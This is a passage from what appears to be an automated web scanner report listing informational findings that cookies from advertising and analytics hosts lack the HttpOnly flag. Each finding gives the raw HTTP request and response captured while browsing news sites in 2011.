Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /V13b?http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html****true/1920x1200/16/irishtimes_ie/ie/UTF-8/1304949672361 HTTP/1.1
Host: ie-stat.bmmetrix.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cid=21725df4b57823249eec87a56c238d3d%3A1304949674; Sid=a67edadab4a72f17f0c0ed04fa46edb7%3A1304951474

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:40 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:04:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: Sid=a67edadab4a72f17f0c0ed04fa46edb7%3A1304951680; path=/
Set-Cookie: Bm_map=bt_ie_1_585=1; expires=Tue, 01 Jan 2030 00:00:00 GMT; path=/
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
10.68. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2931142961646634775 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

10.69. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...
10.70. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669; uid=1_1304949672_1303179323923:6792170478871670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1304949674_29805:59534:2:0_29807:59535:1:5_29802:59536:1:588703; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: uid=1_1304949674_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: kwd=1_1304949674_12936:254612_11317:1206406_11717:1206406_11718:1206406_11719:1206406; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: scg=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Set-Cookie: ppd=1_1304949674; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:14 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:14 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10433

<style type="text/css">body {margin: 0px; padding: 0px;}</style>
<a href="http://imp.fetchback.com/serve/fb/overlay?8945eae51d9a2c8e4a5ff0a7577d8283a6c350af96ce36b3985a1944046ffd99d3a4259f239ce6c8683e
...[SNIP]...
10.71. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795?AQB=1&ndh=1&t=9%2F4%2F2011%209%3A0%3A42%201%20300&ce=UTF-8&ns=ipcmedia&pageName=Sufjan%20Stevens%20suffered%20'breakdown'%20while%20watching%20'Fantastic%20Mr%20Fox'%20%7C%20News%20%7C%20NME.COM&g=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&cc=GBP&ch=News&server=frr-003&c7=tk%3Anews%3Asufjan-stevens%3A56527%3A9&c8=news&c9=56527&c10=sufjan%20stevens%20suffered%20'breakdown'%20while%20watching%20'fantastic%20mr%20fox'&c50=nme&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: ipcmedia.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3F9CE051D0977-400001334000936E[CE]; Expires=Sat, 7 May 2016 14:01:00 GMT; Domain=ipcmedia.122.2o7.net; Path=/
Location: http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795?AQB=1&pccr=true&vidn=26E3F9CE051D0977-400001334000936E&&ndh=1&t=9%2F4%2F2011%209%3A0%3A42%201%20300&ce=UTF-8&ns=ipcmedia&pageName=Sufjan%20Stevens%20suffered%20'breakdown'%20while%20watching%20'Fantastic%20Mr%20Fox'%20%7C%20News%20%7C%20NME.COM&g=http%3A%2F%2Fwww.nme.com%2Fnews%2Fsufjan-stevens%2F56527&cc=GBP&ch=News&server=frr-003&c7=tk%3Anews%3Asufjan-stevens%3A56527%3A9&c8=news&c9=56527&c10=sufjan%20stevens%20suffered%20'breakdown'%20while%20watching%20'fantastic%20mr%20fox'&c50=nme&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:01:00 GMT
Last-Modified: Tue, 10 May 2011 14:01:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www354
Content-Length: 0
Content-Type: text/plain

10.72. http://ipcmedia.grapeshot.co.uk/channels.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.grapeshot.co.uk
Path:   /channels.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /channels.cgi?url=http%3A//www.nme.com/news/sufjan-stevens/56527 HTTP/1.1
Host: ipcmedia.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1503275853

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: 600
GSCategories: olympics (10.846109)
GSID: hk7gfe0
GSResponse: OK
GSResponseDetails: C=1 BC=0 BF=0 CU=0 CC=0
GSUID: 1503275853
GSDeployment: nme
Set-Cookie: uid=1503275853; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Connection: close
Content-Type: text/javascript
Content-Length: 114

// Set gs_channels variable for insertion into an advert call
// contextual categories
gs_channels = "olympics";

10.73. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A12%201%20300&ns=irishtimesgroup&pageName=culture%20article%20full%20-%20Shakin%27%20Stevens&g=http%3A//www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html&cc=EUR&events=event2&h1=culture%2Cmusic%2Carticle&v2=culture%20article%20full%20-%20Shakin%27%20Stevens&c3=Shakin%27%20Stevens&v3=Shakin%27%20Stevens&c4=1224296203710&v4=1224296203710&c5=article&v5=article&c6=culture&v6=culture&c7=culture%3Amusic&v7=culture%3Amusic&c15=newspaper&v15=newspaper&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c18=Data%20Not%20Available&v18=Data%20Not%20Available&c19=Data%20Not%20Available&v19=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: irishtimesgroup.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:04:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3FA2C85010514-40000113002F9539[CE]; Expires=Sat, 7 May 2016 14:04:09 GMT; Domain=irishtimesgroup.112.2o7.net; Path=/
Location: http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069?AQB=1&pccr=true&vidn=26E3FA2C85010514-40000113002F9539&&ndh=1&t=9/4/2011%209%3A1%3A12%201%20300&ns=irishtimesgroup&pageName=culture%20article%20full%20-%20Shakin%27%20Stevens&g=http%3A//www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html&cc=EUR&events=event2&h1=culture%2Cmusic%2Carticle&v2=culture%20article%20full%20-%20Shakin%27%20Stevens&c3=Shakin%27%20Stevens&v3=Shakin%27%20Stevens&c4=1224296203710&v4=1224296203710&c5=article&v5=article&c6=culture&v6=culture&c7=culture%3Amusic&v7=culture%3Amusic&c15=newspaper&v15=newspaper&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c18=Data%20Not%20Available&v18=Data%20Not%20Available&c19=Data%20Not%20Available&v19=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:04:09 GMT
Last-Modified: Tue, 10 May 2011 14:04:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www152
Content-Length: 0
Content-Type: text/plain

10.74. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=B08725 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw